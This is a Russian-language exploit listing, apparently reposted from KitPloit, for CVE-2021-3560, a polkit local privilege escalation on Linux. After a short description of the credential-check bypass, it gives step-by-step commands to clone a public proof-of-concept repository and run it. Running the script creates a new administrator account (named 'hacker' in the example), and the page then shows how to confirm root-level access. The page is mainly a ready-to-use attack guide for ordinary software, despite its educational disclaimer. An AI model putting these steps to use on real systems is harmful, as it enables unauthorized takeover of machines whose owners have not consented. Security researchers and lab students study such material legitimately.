## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ASEPSAEPDIN-CVE-2021-3560
# CVE-2021-3560 - локальное повышение привилегий Polkit
   
* * *
⚠️ _Только для образовательных и санкционированных исследований в области безопасности_
## Оригинальные авторы эксплойта
Огромная благодарность оригинальному автору PoC @UNICORDev (@NicPWNs и @Dev-Yeoj)
## Описание
Было обнаружено, что polkit можно обманом заставить обойти проверки учетных данных для D-Bus запросов, повышая привилегии запрашивающего до пользователя root. Эта ошибка может быть использована непривилегированным локальным злоумышленником, например, для создания нового локального администратора. Наибольшая угроза от этой уязвимости — конфиденциальность и целостность данных, а также доступность системы.
## Демонстрация

* * *
## Пошаговые инструкции
1. Установите git и склонируйте скрипт из репозитория GitHub:
root@kitploit:~
sudo apt install git python3 -y
git clone https://github.com/asepsaepdin/CVE-2021-3560.git
2. Запустите скрипт PoC следующей командой:
root@kitploit:~
python3 exploit-CVE-2021-3560.py -u hacker -p password
> **Примечания** : укажите в параметре -u желаемое имя пользователя, а в параметре -p — желаемый пароль
3. Проверьте созданного пользователя следующей командой:
root@kitploit:~
su hacker
id
* * *
## Благодарности
* https://nvd.nist.gov/vuln/detail/CVE-2021-3560
* https://app.hackthebox.com/machines/Paper
* https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
* https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py